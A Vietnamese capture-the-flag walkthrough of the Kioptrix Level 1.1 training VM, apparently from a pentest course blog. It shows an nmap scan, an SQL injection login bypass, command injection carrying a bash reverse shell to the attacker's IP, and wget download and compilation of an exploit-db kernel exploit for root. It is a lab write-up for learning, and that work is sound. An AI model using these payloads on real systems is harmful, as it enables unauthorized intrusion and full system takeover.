Hack The Kioptrix Level-1.1 (Thử thách Boot2Root) – SQL Injection

Video Demo trong Khóa học PENTEST + (CEH VIETNAM)

Hack The Kioptrix Cấp độ-1

Kioptrix VM Image này là một thử thách không quá khó, rất thích hợp với các bạn sinh viên nếu phải chọn 1 đề tài pentest nộp cho thầy. Mục tiêu của trò chơi là có được quyền truy cập root thông qua bất kỳ phương tiện nào có thể (ngoại trừ việc thực sự hack máy chủ hoặc trình phát VM). Mục đích của các trò chơi này là để tìm hiểu các công cụ và kỹ thuật cơ bản trong việc đánh giá và khai thác tính dễ bị tổn thương. Có nhiều cách hơn để hoàn thành các thử thách một cách thành công.

Bạn có thể tải xuống từ đây và chạy cài đặt trong máy ảo của mình.

Hãy bắt đầu!!

Bật máy tấn công của bạn và sử dụng lệnh netdiscover để quét mạng cục bộ của bạn để lấy IP mục tiêu.

Ở đây, các bạn nên dùng Kali 2021 cho nó mới, ví dụ IP là 192.168.1.107

Kết quả ta thấy 192.168.1.111 là máy ảo Vmware. Vì vậy, chúng tôi nhắm mục tiêu tại 192.168.1.111 cho phép liệt kê và quét các cổng và giao thức đang mở. Với sự trợ giúp của tính năng quét tích cực nmap, chúng tôi đã quan sát thấy một số cổng đang mở và dịch vụ đang chạy trên đó. Hãy tham khảo bài hack Kioptrx level 1 để nắm sơ bộ một số hướng tấn công …

1nmap -A 192.168.1.111

Vì cổng 80 được mở nên chúng tôi đã khám phá IP mục tiêu trong trình duyệt web và nhận thấy trang đăng nhập sau.

URL: http://192.168.1.111

Không lãng phí thời gian, chúng tôi thử khai thác SQL injection  .

1
2
Username: 1′ or ‘1’
Password: 1′ or ‘1’

Tuyệt quá!!! Đã đăng nhập thành công vào Bảng điều khiển web quản trị cơ bản, nơi các bạn tìm thấy một trường văn bản trống cho người dùng nhập. Bất cứ khi nào tôi thấy loại kịch bản như vậy, tôi cố gắng kiểm tra nó để chống lại các lỗ hổng tiêm lệnh (command injection)

Do đó, chúng tôi gửi lệnh ; id để liệt kê UID và GID của người dùng đã đăng nhập.

Kết quả là nó kết xuất UID và GID của apache và do đó bằng chứng rằng ứng dụng này dễ bị tấn công bởi lệnh Injection.

Trong một thiết bị đầu cuối mới, chúng tôi khởi chạy trình bao kết nối netcat để sinh ra trình bao tty của nạn nhân. Sau đó, gửi tải trọng sau làm đầu vào của người dùng bên trong ứng dụng web. Đây là thủ pháp mà các bạn nên ghi vào sổ tay để nằm lòng. Đôi khi phải thử nhiều có khi pahi3 dùng netcat tradational, rồi phải chọn reverse shell hay bind shell….

Hãy lắng nghe với netcat trên Kali Linux 2021 của các bạn port 8888

127.0.0.1; bash -i> & /dev/tcp/192.168.1.107/8888 0> & 1

Ngay sau khi tải trọng trên sẽ được gửi, bạn nhận được trình bao pty của nạn nhân thông qua phiên netcat.

Tuyệt vời!! Bạn có thể thấy chúng tôi đã truy cập vào vỏ lệnh của nạn nhân bên trong netcat, hãy thâm nhập nó nhiều hơn để truy cập root.

1
2
id
uname -a

Sau đó, với sự trợ giúp của Google, chúng tôi tìm kiếm khai thác Kernel của nó để nâng cấp đặc quyền và tìm thấy May mắn thay “Linux kernel 2.6 <2.6.19 (32bit) ip_append_data () local ring0 root khai thác” do đó chúng tôi có thể sử dụng 9542exploi t để leo thang đặc quyền.

——— Hãy thử dùng searchsploit để tìm bug thay cho Google xem sao

1
2
3
cd /tmp
wget https://www.exploit-db.com/download/9542 –no-check-certificate
mv 9542 shell.c
1
2
3
4
gcc shell.c.
/a.out
id
whoami

B0000MM !! Ở đây chúng ta có lệnh shell của máy nạn nhân có quyền truy cập root.

Video Demo trong Khóa học PENTEST + (CEH VIETNAM)


Trả lời

Bạn cần phải đăng nhập để gửi bình luận:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

%d người thích bài này: